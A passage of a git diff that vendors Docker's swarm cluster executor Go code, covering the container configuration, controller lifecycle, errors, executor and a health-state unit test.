enginemount.PropagationRSlave + case api.MountPropagationSlave: + mount.BindOptions.Propagation = enginemount.PropagationSlave + case api.MountPropagationRShared: + mount.BindOptions.Propagation = enginemount.PropagationRShared + case api.MountPropagationShared: + mount.BindOptions.Propagation = enginemount.PropagationShared + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &enginemount.VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + } + if m.VolumeOptions.Labels != nil { + mount.VolumeOptions.Labels = make(map[string]string, len(m.VolumeOptions.Labels)) + for k, v := range m.VolumeOptions.Labels { + mount.VolumeOptions.Labels[k] = v + } + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &enginemount.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + } + if m.VolumeOptions.DriverConfig.Options != nil { + mount.VolumeOptions.DriverConfig.Options = make(map[string]string, len(m.VolumeOptions.DriverConfig.Options)) + for k, v := range m.VolumeOptions.DriverConfig.Options { + mount.VolumeOptions.DriverConfig.Options[k] = v + } + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &enginemount.TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + + return mount +} + +func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig { + hcSpec := c.spec().Healthcheck + if hcSpec == nil { + return nil + } + interval, _ := ptypes.Duration(hcSpec.Interval) + timeout, _ := ptypes.Duration(hcSpec.Timeout) + return &enginecontainer.HealthConfig{ + Test: hcSpec.Test, + Interval: interval, + Timeout: timeout, + Retries: int(hcSpec.Retries), + } +} + +func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { + hc := &enginecontainer.HostConfig{ + Resources: c.resources(), + GroupAdd: c.spec().Groups, + PortBindings: c.portBindings(), + Mounts: c.mounts(), + } + + if c.spec().DNSConfig != nil { + hc.DNS = c.spec().DNSConfig.Nameservers + hc.DNSSearch = 
c.spec().DNSConfig.Search + hc.DNSOptions = c.spec().DNSConfig.Options + } + + // The format of extra hosts on swarmkit is specified in: + // http://man7.org/linux/man-pages/man5/hosts.5.html + // IP_address canonical_hostname [aliases...] + // However, the format of ExtraHosts in HostConfig is + // : + // We need to do the conversion here + // (Alias is ignored for now) + for _, entry := range c.spec().Hosts { + parts := strings.Fields(entry) + if len(parts) > 1 { + hc.ExtraHosts = append(hc.ExtraHosts, fmt.Sprintf("%s:%s", parts[1], parts[0])) + } + } + + if c.task.LogDriver != nil { + hc.LogConfig = enginecontainer.LogConfig{ + Type: c.task.LogDriver.Name, + Config: c.task.LogDriver.Options, + } + } + + return hc +} + +// This handles the case of volumes that are defined inside a service Mount +func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody { + var ( + driverName string + driverOpts map[string]string + labels map[string]string + ) + + if mount.VolumeOptions != nil && mount.VolumeOptions.DriverConfig != nil { + driverName = mount.VolumeOptions.DriverConfig.Name + driverOpts = mount.VolumeOptions.DriverConfig.Options + labels = mount.VolumeOptions.Labels + } + + if mount.VolumeOptions != nil { + return &volumetypes.VolumesCreateBody{ + Name: mount.Source, + Driver: driverName, + DriverOpts: driverOpts, + Labels: labels, + } + } + return nil +} + +func (c *containerConfig) resources() enginecontainer.Resources { + resources := enginecontainer.Resources{} + + // If no limits are specified let the engine use its defaults. + // + // TODO(aluzzardi): We might want to set some limits anyway otherwise + // "unlimited" tasks will step over the reservation of other tasks. + r := c.task.Spec.Resources + if r == nil || r.Limits == nil { + return resources + } + + if r.Limits.MemoryBytes > 0 { + resources.Memory = r.Limits.MemoryBytes + } + + if r.Limits.NanoCPUs > 0 { + // CPU Period must be set in microseconds. 
+ resources.CPUPeriod = int64(cpuQuotaPeriod / time.Microsecond) + resources.CPUQuota = r.Limits.NanoCPUs * resources.CPUPeriod / 1e9 + } + + return resources +} + +// Docker daemon supports just 1 network during container create. +func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { + var networks []*api.NetworkAttachment + if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil { + networks = c.task.Networks + } + + epConfig := make(map[string]*network.EndpointSettings) + if len(networks) > 0 { + epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0]) + } + + return &network.NetworkingConfig{EndpointsConfig: epConfig} +} + +// TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create +func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { + var networks []*api.NetworkAttachment + if c.task.Spec.GetContainer() != nil { + networks = c.task.Networks + } + + // First network is used during container create. 
Other networks are used in "docker network connect" + if len(networks) < 2 { + return nil + } + + epConfig := make(map[string]*network.EndpointSettings) + for _, na := range networks[1:] { + epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na) + } + return &network.NetworkingConfig{EndpointsConfig: epConfig} +} + +func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { + var ipv4, ipv6 string + for _, addr := range na.Addresses { + ip, _, err := net.ParseCIDR(addr) + if err != nil { + continue + } + + if ip.To4() != nil { + ipv4 = ip.String() + continue + } + + if ip.To16() != nil { + ipv6 = ip.String() + } + } + + return &network.EndpointSettings{ + NetworkID: na.Network.ID, + IPAMConfig: &network.EndpointIPAMConfig{ + IPv4Address: ipv4, + IPv6Address: ipv6, + }, + } +} + +func (c *containerConfig) virtualIP(networkID string) string { + if c.task.Endpoint == nil { + return "" + } + + for _, eVip := range c.task.Endpoint.VirtualIPs { + // We only support IPv4 VIPs for now. + if eVip.NetworkID == networkID { + vip, _, err := net.ParseCIDR(eVip.Addr) + if err != nil { + return "" + } + + return vip.String() + } + } + + return "" +} + +func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig { + if len(c.task.Networks) == 0 { + return nil + } + + logrus.Debugf("Creating service config in agent for t = %+v", c.task) + svcCfg := &clustertypes.ServiceConfig{ + Name: c.task.ServiceAnnotations.Name, + Aliases: make(map[string][]string), + ID: c.task.ServiceID, + VirtualAddresses: make(map[string]*clustertypes.VirtualAddress), + } + + for _, na := range c.task.Networks { + svcCfg.VirtualAddresses[na.Network.ID] = &clustertypes.VirtualAddress{ + // We support only IPv4 virtual IP for now. 
+ IPv4: c.virtualIP(na.Network.ID), + } + if len(na.Aliases) > 0 { + svcCfg.Aliases[na.Network.ID] = na.Aliases + } + } + + if c.task.Endpoint != nil { + for _, ePort := range c.task.Endpoint.Ports { + if ePort.PublishMode != api.PublishModeIngress { + continue + } + + svcCfg.ExposedPorts = append(svcCfg.ExposedPorts, &clustertypes.PortConfig{ + Name: ePort.Name, + Protocol: int32(ePort.Protocol), + TargetPort: ePort.TargetPort, + PublishedPort: ePort.PublishedPort, + }) + } + } + + return svcCfg +} + +// networks returns a list of network names attached to the container. The +// returned name can be used to lookup the corresponding network create +// options. +func (c *containerConfig) networks() []string { + var networks []string + + for name := range c.networksAttachments { + networks = append(networks, name) + } + + return networks +} + +func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) { + na, ok := c.networksAttachments[name] + if !ok { + return clustertypes.NetworkCreateRequest{}, errors.New("container: unknown network referenced") + } + + options := types.NetworkCreate{ + // ID: na.Network.ID, + Driver: na.Network.DriverState.Name, + IPAM: &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + Options: na.Network.IPAM.Driver.Options, + }, + Options: na.Network.DriverState.Options, + Labels: na.Network.Spec.Annotations.Labels, + Internal: na.Network.Spec.Internal, + Attachable: na.Network.Spec.Attachable, + EnableIPv6: na.Network.Spec.Ipv6Enabled, + CheckDuplicate: true, + } + + for _, ic := range na.Network.IPAM.Configs { + c := network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + + return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil +} + +func (c containerConfig) eventFilter() filters.Args { + filter := filters.NewArgs() + 
filter.Add("type", events.ContainerEventType) + filter.Add("name", c.name()) + filter.Add("label", fmt.Sprintf("%v.task.id=%v", systemLabelPrefix, c.task.ID)) + return filter +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go new file mode 100644 index 0000000000..75f286a217 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go @@ -0,0 +1,672 @@ +package container + +import ( + "bufio" + "bytes" + "encoding/binary" + "fmt" + "io" + "os" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/log" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/pkg/errors" + "golang.org/x/net/context" + "golang.org/x/time/rate" +) + +// controller implements agent.Controller against docker's API. +// +// Most operations against docker's API are done through the container name, +// which is unique to the task. +type controller struct { + task *api.Task + adapter *containerAdapter + closed chan struct{} + err error + + pulled chan struct{} // closed after pull + cancelPull func() // cancels pull context if not nil + pullErr error // pull error, only read after pulled closed +} + +var _ exec.Controller = &controller{} + +// NewController returns a docker exec runner for the provided task. 
+func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) { + adapter, err := newContainerAdapter(b, task, secrets) + if err != nil { + return nil, err + } + + return &controller{ + task: task, + adapter: adapter, + closed: make(chan struct{}), + }, nil +} + +func (r *controller) Task() (*api.Task, error) { + return r.task, nil +} + +// ContainerStatus returns the container-specific status for the task. +func (r *controller) ContainerStatus(ctx context.Context) (*api.ContainerStatus, error) { + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if isUnknownContainer(err) { + return nil, nil + } + return nil, err + } + return parseContainerStatus(ctnr) +} + +func (r *controller) PortStatus(ctx context.Context) (*api.PortStatus, error) { + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if isUnknownContainer(err) { + return nil, nil + } + + return nil, err + } + + return parsePortStatus(ctnr) +} + +// Update tasks a recent task update and applies it to the container. +func (r *controller) Update(ctx context.Context, t *api.Task) error { + // TODO(stevvooe): While assignment of tasks is idempotent, we do allow + // updates of metadata, such as labelling, as well as any other properties + // that make sense. + return nil +} + +// Prepare creates a container and ensures the image is pulled. +// +// If the container has already be created, exec.ErrTaskPrepared is returned. +func (r *controller) Prepare(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + // Make sure all the networks that the task needs are created. + if err := r.adapter.createNetworks(ctx); err != nil { + return err + } + + // Make sure all the volumes that the task needs are created. 
+ if err := r.adapter.createVolumes(ctx); err != nil { + return err + } + + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + if r.pulled == nil { + // Fork the pull to a different context to allow pull to continue + // on re-entrant calls to Prepare. This ensures that Prepare can be + // idempotent and not incur the extra cost of pulling when + // cancelled on updates. + var pctx context.Context + + r.pulled = make(chan struct{}) + pctx, r.cancelPull = context.WithCancel(context.Background()) // TODO(stevvooe): Bind a context to the entire controller. + + go func() { + defer close(r.pulled) + r.pullErr = r.adapter.pullImage(pctx) // protected by closing r.pulled + }() + } + + select { + case <-ctx.Done(): + return ctx.Err() + case <-r.pulled: + if r.pullErr != nil { + // NOTE(stevvooe): We always try to pull the image to make sure we have + // the most up to date version. This will return an error, but we only + // log it. If the image truly doesn't exist, the create below will + // error out. + // + // This gives us some nice behavior where we use up to date versions of + // mutable tags, but will still run if the old image is available but a + // registry is down. + // + // If you don't want this behavior, lock down your image to an + // immutable tag or digest. + log.G(ctx).WithError(r.pullErr).Error("pulling image failed") + } + } + } + + if err := r.adapter.create(ctx); err != nil { + if isContainerCreateNameConflict(err) { + if _, err := r.adapter.inspect(ctx); err != nil { + return err + } + + // container is already created. success! + return exec.ErrTaskPrepared + } + + return err + } + + return nil +} + +// Start the container. An error will be returned if the container is already started. +func (r *controller) Start(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + return err + } + + // Detect whether the container has *ever* been started. 
If so, we don't + // issue the start. + // + // TODO(stevvooe): This is very racy. While reading inspect, another could + // start the process and we could end up starting it twice. + if ctnr.State.Status != "created" { + return exec.ErrTaskStarted + } + + for { + if err := r.adapter.start(ctx); err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + // Retry network creation again if we + // failed because some of the networks + // were not found. + if err := r.adapter.createNetworks(ctx); err != nil { + return err + } + + continue + } + + return errors.Wrap(err, "starting container failed") + } + + break + } + + // no health check + if ctnr.Config == nil || ctnr.Config.Healthcheck == nil { + if err := r.adapter.activateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name()) + return err + } + return nil + } + + healthCmd := ctnr.Config.Healthcheck.Test + + if len(healthCmd) == 0 || healthCmd[0] == "NONE" { + return nil + } + + // wait for container to be healthy + eventq := r.adapter.events(ctx) + + var healthErr error + for { + select { + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "die": // exit on terminal events + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + return errors.Wrap(err, "die event received") + } else if ctnr.State.ExitCode != 0 { + return &exitError{code: ctnr.State.ExitCode, cause: healthErr} + } + + return nil + case "destroy": + // If we get here, something has gone wrong but we want to exit + // and report anyways. 
+ return ErrContainerDestroyed + case "health_status: unhealthy": + // in this case, we stop the container and report unhealthy status + if err := r.Shutdown(ctx); err != nil { + return errors.Wrap(err, "unhealthy container shutdown failed") + } + // set health check error, and wait for container to fully exit ("die" event) + healthErr = ErrContainerUnhealthy + case "health_status: healthy": + if err := r.adapter.activateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s after healthy event", r.adapter.container.name()) + return err + } + return nil + } + case <-ctx.Done(): + return ctx.Err() + case <-r.closed: + return r.err + } + } +} + +// Wait on the container to exit. +func (r *controller) Wait(pctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + healthErr := make(chan error, 1) + go func() { + ectx, cancel := context.WithCancel(ctx) // cancel event context on first event + defer cancel() + if err := r.checkHealth(ectx); err == ErrContainerUnhealthy { + healthErr <- ErrContainerUnhealthy + if err := r.Shutdown(ectx); err != nil { + log.G(ectx).WithError(err).Debug("shutdown failed on unhealthy") + } + } + }() + + err := r.adapter.wait(ctx) + if ctx.Err() != nil { + return ctx.Err() + } + + if err != nil { + ee := &exitError{} + if ec, ok := err.(exec.ExitCoder); ok { + ee.code = ec.ExitCode() + } + select { + case e := <-healthErr: + ee.cause = e + default: + if err.Error() != "" { + ee.cause = err + } + } + return ee + } + + return nil +} + +// Shutdown the container cleanly. 
+func (r *controller) Shutdown(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + // remove container from service binding + if err := r.adapter.deactivateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name()) + return err + } + + if err := r.adapter.shutdown(ctx); err != nil { + if isUnknownContainer(err) || isStoppedContainer(err) { + return nil + } + + return err + } + + return nil +} + +// Terminate the container, with force. +func (r *controller) Terminate(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + if err := r.adapter.terminate(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + + return err + } + + return nil +} + +// Remove the container and its resources. +func (r *controller) Remove(ctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + if r.cancelPull != nil { + r.cancelPull() + } + + // It may be necessary to shut down the task before removing it. + if err := r.Shutdown(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + // This may fail if the task was already shut down. + log.G(ctx).WithError(err).Debug("shutdown failed on removal") + } + + // Try removing networks referenced in this task in case this + // task is the last one referencing it + if err := r.adapter.removeNetworks(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + return err + } + + if err := r.adapter.remove(ctx); err != nil { + if isUnknownContainer(err) { + return nil + } + + return err + } + return nil +} + +// waitReady waits for a container to be "ready". +// Ready means it's past the started state. 
+func (r *controller) waitReady(pctx context.Context) error { + if err := r.checkClosed(); err != nil { + return err + } + + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + eventq := r.adapter.events(ctx) + + ctnr, err := r.adapter.inspect(ctx) + if err != nil { + if !isUnknownContainer(err) { + return errors.Wrap(err, "inspect container failed") + } + } else { + switch ctnr.State.Status { + case "running", "exited", "dead": + return nil + } + } + + for { + select { + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "start": + return nil + } + case <-ctx.Done(): + return ctx.Err() + case <-r.closed: + return r.err + } + } +} + +func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, options api.LogSubscriptionOptions) error { + if err := r.checkClosed(); err != nil { + return err + } + + if err := r.waitReady(ctx); err != nil { + return errors.Wrap(err, "container not ready for logs") + } + + rc, err := r.adapter.logs(ctx, options) + if err != nil { + return errors.Wrap(err, "failed getting container logs") + } + defer rc.Close() + + var ( + // use a rate limiter to keep things under control but also provides some + // ability coalesce messages. + limiter = rate.NewLimiter(rate.Every(time.Second), 10<<20) // 10 MB/s + msgctx = api.LogContext{ + NodeID: r.task.NodeID, + ServiceID: r.task.ServiceID, + TaskID: r.task.ID, + } + ) + + brd := bufio.NewReader(rc) + for { + // so, message header is 8 bytes, treat as uint64, pull stream off MSB + var header uint64 + if err := binary.Read(brd, binary.BigEndian, &header); err != nil { + if err == io.EOF { + return nil + } + + return errors.Wrap(err, "failed reading log header") + } + + stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3)) + + // limit here to decrease allocation back pressure. 
+ if err := limiter.WaitN(ctx, int(size)); err != nil { + return errors.Wrap(err, "failed rate limiter") + } + + buf := make([]byte, size) + _, err := io.ReadFull(brd, buf) + if err != nil { + return errors.Wrap(err, "failed reading buffer") + } + + // Timestamp is RFC3339Nano with 1 space after. Lop, parse, publish + parts := bytes.SplitN(buf, []byte(" "), 2) + if len(parts) != 2 { + return fmt.Errorf("invalid timestamp in log message: %v", buf) + } + + ts, err := time.Parse(time.RFC3339Nano, string(parts[0])) + if err != nil { + return errors.Wrap(err, "failed to parse timestamp") + } + + tsp, err := ptypes.TimestampProto(ts) + if err != nil { + return errors.Wrap(err, "failed to convert timestamp") + } + + if err := publisher.Publish(ctx, api.LogMessage{ + Context: msgctx, + Timestamp: tsp, + Stream: api.LogStream(stream), + + Data: parts[1], + }); err != nil { + return errors.Wrap(err, "failed to publish log message") + } + } +} + +// Close the runner and clean up any ephemeral resources. +func (r *controller) Close() error { + select { + case <-r.closed: + return r.err + default: + if r.cancelPull != nil { + r.cancelPull() + } + + r.err = exec.ErrControllerClosed + close(r.closed) + } + return nil +} + +func (r *controller) matchevent(event events.Message) bool { + if event.Type != events.ContainerEventType { + return false + } + + // TODO(stevvooe): Filter based on ID matching, in addition to name. + + // Make sure the events are for this container. 
+ if event.Actor.Attributes["name"] != r.adapter.container.name() { + return false + } + + return true +} + +func (r *controller) checkClosed() error { + select { + case <-r.closed: + return r.err + default: + return nil + } +} + +func parseContainerStatus(ctnr types.ContainerJSON) (*api.ContainerStatus, error) { + status := &api.ContainerStatus{ + ContainerID: ctnr.ID, + PID: int32(ctnr.State.Pid), + ExitCode: int32(ctnr.State.ExitCode), + } + + return status, nil +} + +func parsePortStatus(ctnr types.ContainerJSON) (*api.PortStatus, error) { + status := &api.PortStatus{} + + if ctnr.NetworkSettings != nil && len(ctnr.NetworkSettings.Ports) > 0 { + exposedPorts, err := parsePortMap(ctnr.NetworkSettings.Ports) + if err != nil { + return nil, err + } + status.Ports = exposedPorts + } + + return status, nil +} + +func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) { + exposedPorts := make([]*api.PortConfig, 0, len(portMap)) + + for portProtocol, mapping := range portMap { + parts := strings.SplitN(string(portProtocol), "/", 2) + if len(parts) != 2 { + return nil, fmt.Errorf("invalid port mapping: %s", portProtocol) + } + + port, err := strconv.ParseUint(parts[0], 10, 16) + if err != nil { + return nil, err + } + + protocol := api.ProtocolTCP + switch strings.ToLower(parts[1]) { + case "tcp": + protocol = api.ProtocolTCP + case "udp": + protocol = api.ProtocolUDP + default: + return nil, fmt.Errorf("invalid protocol: %s", parts[1]) + } + + for _, binding := range mapping { + hostPort, err := strconv.ParseUint(binding.HostPort, 10, 16) + if err != nil { + return nil, err + } + + // TODO(aluzzardi): We're losing the port `name` here since + // there's no way to retrieve it back from the Engine. 
+ exposedPorts = append(exposedPorts, &api.PortConfig{ + PublishMode: api.PublishModeHost, + Protocol: protocol, + TargetPort: uint32(port), + PublishedPort: uint32(hostPort), + }) + } + } + + return exposedPorts, nil +} + +type exitError struct { + code int + cause error +} + +func (e *exitError) Error() string { + if e.cause != nil { + return fmt.Sprintf("task: non-zero exit (%v): %v", e.code, e.cause) + } + + return fmt.Sprintf("task: non-zero exit (%v)", e.code) +} + +func (e *exitError) ExitCode() int { + return int(e.code) +} + +func (e *exitError) Cause() error { + return e.cause +} + +// checkHealth blocks until unhealthy container is detected or ctx exits +func (r *controller) checkHealth(ctx context.Context) error { + eventq := r.adapter.events(ctx) + + for { + select { + case <-ctx.Done(): + return nil + case <-r.closed: + return nil + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "health_status: unhealthy": + return ErrContainerUnhealthy + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go new file mode 100644 index 0000000000..63e1233566 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go @@ -0,0 +1,15 @@ +package container + +import "fmt" + +var ( + // ErrImageRequired returned if a task is missing the image definition. + ErrImageRequired = fmt.Errorf("dockerexec: image required") + + // ErrContainerDestroyed returned when a container is prematurely destroyed + // during a wait call. 
+ ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed") + + // ErrContainerUnhealthy returned if controller detects the health check failure + ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container") +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go new file mode 100644 index 0000000000..f0dedd4530 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go @@ -0,0 +1,194 @@ +package container + +import ( + "sort" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/agent/secrets" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +type executor struct { + backend executorpkg.Backend + secrets exec.SecretsManager +} + +// NewExecutor returns an executor from the docker client. +func NewExecutor(b executorpkg.Backend) exec.Executor { + return &executor{ + backend: b, + secrets: secrets.NewManager(), + } +} + +// Describe returns the underlying node description from the docker client. +func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { + info, err := e.backend.SystemInfo() + if err != nil { + return nil, err + } + + plugins := map[api.PluginDescription]struct{}{} + addPlugins := func(typ string, names []string) { + for _, name := range names { + plugins[api.PluginDescription{ + Type: typ, + Name: name, + }] = struct{}{} + } + } + + // add v1 plugins + addPlugins("Volume", info.Plugins.Volume) + // Add builtin driver "overlay" (the only builtin multi-host driver) to + // the plugin list by default. 
+ addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...)) + addPlugins("Authorization", info.Plugins.Authorization) + + // add v2 plugins + v2Plugins, err := e.backend.PluginManager().List() + if err == nil { + for _, plgn := range v2Plugins { + for _, typ := range plgn.Config.Interface.Types { + if typ.Prefix != "docker" || !plgn.Enabled { + continue + } + plgnTyp := typ.Capability + if typ.Capability == "volumedriver" { + plgnTyp = "Volume" + } else if typ.Capability == "networkdriver" { + plgnTyp = "Network" + } + plugins[api.PluginDescription{ + Type: plgnTyp, + Name: plgn.Name, + }] = struct{}{} + } + } + } + + pluginFields := make([]api.PluginDescription, 0, len(plugins)) + for k := range plugins { + pluginFields = append(pluginFields, k) + } + + sort.Sort(sortedPlugins(pluginFields)) + + // parse []string labels into a map[string]string + labels := map[string]string{} + for _, l := range info.Labels { + stringSlice := strings.SplitN(l, "=", 2) + // this will take the last value in the list for a given key + // ideally, one shouldn't assign multiple values to the same key + if len(stringSlice) > 1 { + labels[stringSlice[0]] = stringSlice[1] + } + } + + description := &api.NodeDescription{ + Hostname: info.Name, + Platform: &api.Platform{ + Architecture: info.Architecture, + OS: info.OSType, + }, + Engine: &api.EngineDescription{ + EngineVersion: info.ServerVersion, + Labels: labels, + Plugins: pluginFields, + }, + Resources: &api.Resources{ + NanoCPUs: int64(info.NCPU) * 1e9, + MemoryBytes: info.MemTotal, + }, + } + + return description, nil +} + +func (e *executor) Configure(ctx context.Context, node *api.Node) error { + na := node.Attachment + if na == nil { + return nil + } + + options := types.NetworkCreate{ + Driver: na.Network.DriverState.Name, + IPAM: &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + }, + Options: na.Network.DriverState.Options, + CheckDuplicate: true, + } + + for _, ic := range na.Network.IPAM.Configs { + c 
:= network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + + return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ + na.Network.ID, + types.NetworkCreateRequest{ + Name: na.Network.Spec.Annotations.Name, + NetworkCreate: options, + }, + }, na.Addresses[0]) +} + +// Controller returns a docker container runner. +func (e *executor) Controller(t *api.Task) (exec.Controller, error) { + if t.Spec.GetAttachment() != nil { + return newNetworkAttacherController(e.backend, t, e.secrets) + } + + ctlr, err := newController(e.backend, t, e.secrets) + if err != nil { + return nil, err + } + + return ctlr, nil +} + +func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error { + nwKeys := []*networktypes.EncryptionKey{} + for _, key := range keys { + nwKey := &networktypes.EncryptionKey{ + Subsystem: key.Subsystem, + Algorithm: int32(key.Algorithm), + Key: make([]byte, len(key.Key)), + LamportTime: key.LamportTime, + } + copy(nwKey.Key, key.Key) + nwKeys = append(nwKeys, nwKey) + } + e.backend.SetNetworkBootstrapKeys(nwKeys) + + return nil +} + +func (e *executor) Secrets() exec.SecretsManager { + return e.secrets +} + +type sortedPlugins []api.PluginDescription + +func (sp sortedPlugins) Len() int { return len(sp) } + +func (sp sortedPlugins) Swap(i, j int) { sp[i], sp[j] = sp[j], sp[i] } + +func (sp sortedPlugins) Less(i, j int) bool { + if sp[i].Type != sp[j].Type { + return sp[i].Type < sp[j].Type + } + return sp[i].Name < sp[j].Name +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go new file mode 100644 index 0000000000..99cf7502af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go @@ -0,0 +1,102 @@ +// +build !windows + +package container + +import ( + "testing" + "time" + + 
containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/events" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +func TestHealthStates(t *testing.T) { + + // set up environment: events, task, container .... + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + task := &api.Task{ + ID: "id", + ServiceID: "sid", + Spec: api.TaskSpec{ + Runtime: &api.TaskSpec_Container{ + Container: &api.ContainerSpec{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + }, + }, + }, + Annotations: api.Annotations{Name: "name"}, + } + + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "id", + Name: "name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + }, + }, + } + + daemon := &daemon.Daemon{ + EventsService: e, + } + + controller, err := newController(daemon, task, nil) + if err != nil { + t.Fatalf("create controller fail %v", err) + } + + errChan := make(chan error, 1) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // fire checkHealth + go func() { + err := controller.checkHealth(ctx) + select { + case errChan <- err: + case <-ctx.Done(): + } + }() + + // send an event and expect to get expectedErr + // if expectedErr is nil, shouldn't get any error + logAndExpect := func(msg string, expectedErr error) { + daemon.LogContainerEvent(c, msg) + + timer := time.NewTimer(1 * time.Second) + defer timer.Stop() + + select { + case err := <-errChan: + if err != expectedErr { + t.Fatalf("expect error %v, but get %v", expectedErr, err) + } + case <-timer.C: + if expectedErr != nil { + t.Fatalf("time limit exceeded, didn't get expected error") + } + } + } + + // events that are ignored by checkHealth + logAndExpect("health_status: running", nil) + 
